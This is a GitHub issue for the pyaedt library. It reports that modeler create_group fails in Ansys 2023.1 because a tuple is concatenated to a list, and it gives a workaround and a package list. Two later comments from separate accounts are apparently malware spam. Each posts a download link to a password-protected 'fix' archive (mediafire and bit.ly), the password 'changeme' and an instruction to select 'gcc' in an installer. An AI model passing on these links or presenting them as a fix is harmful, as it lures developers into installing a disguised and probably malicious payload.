ansys/pyaedt #5096: modeler3D create_group fails in Ansys 2023.1

adamgregory81, 2024-08-27:
### Before submitting the issue

- [X] I have searched among the existing issues
- [X] I am using a Python virtual environment

### Description of the bug

Line 5625 in primitives.py produces an error because self.oeditor.GetChildNames("Groups")[::] returns a tuple instead of a list in Ansys 2023.1.  I checked in 2024.2, and it returns a list as expected.

I was able to temporarily work around by casting to list:
all_objects = self.object_names[:] + list(self.oeditor.GetChildNames("Groups")[::])

### Steps To Reproduce

Run Pyaedt with Ansys 2023.1
Call the hfss.modeler.create_group function
It returns the following error:
ERROR:Global:    modeler.create_group(objects=object_list, group_name=group_name)
PyAEDT ERROR: Can only concatenate list (not "tuple") to list on create_group

### Which Operating System are you using?

Windows

### Which Python version are you using?

3.8

### Installed packages

aiohttp==3.8.3
aiosignal==1.2.0
altgraph==0.17.3
annotated-types==0.7.0
ansys-pythonnet==3.1.0rc3
appdirs==1.4.4
async-timeout==4.0.2
attrs==24.2.0
cachetools==5.3.0
cffi==1.17.0
charset-normalizer==2.1.1
clr-loader==0.2.6
contourpy==1.0.5
cycler==0.11.0
defusedxml==0.7.1
et-xmlfile==1.1.0
fonttools==4.37.3
fpdf2==2.7.9
frozenlist==1.3.1
idna==3.4
imageio==2.22.0
importlib_metadata==8.4.0
importlib_resources==6.4.4
jsonschema==4.23.0
jsonschema-specifications==2023.12.1
kiwisolver==1.4.4
matplotlib==3.6.0
multidict==6.0.2
numpy==1.23.3
openpyxl==3.0.10
packaging==24.1
pandas==1.5.1
pefile==2023.2.7
pillow==10.4.0
pkgutil_resolve_name==1.3.10
plumbum==1.8.3
psutil==6.0.0
py2exe==0.13.0.0
pyaedt==0.10.0
pycparser==2.22
pydantic==2.8.2
pydantic_core==2.20.1
pyedb==0.25.0
pyinstaller==6.10.0
pyinstaller-hooks-contrib==2024.8
pyparsing==3.0.9
python-dateutil==2.8.2
pythonnet==3.0.1
pytomlpp==1.0.13
pytz==2022.2.1
pyvista==0.36.1
pywin32==306
pywin32-ctypes==0.2.3
referencing==0.35.1
rpds-py==0.20.0
rpyc==6.0.0
Rtree==1.3.0
scikit-rf==1.2.0
scipy==1.10.1
scooby==0.6.0
six==1.16.0
toml==0.10.2
typing_extensions==4.12.2
vtk==9.1.0
wslink==1.8.2
yarl==1.8.1
zipp==3.20.1

miniMuggle, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

YeGop0218, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

closed 2024-08-28 by Samuelopez-ansys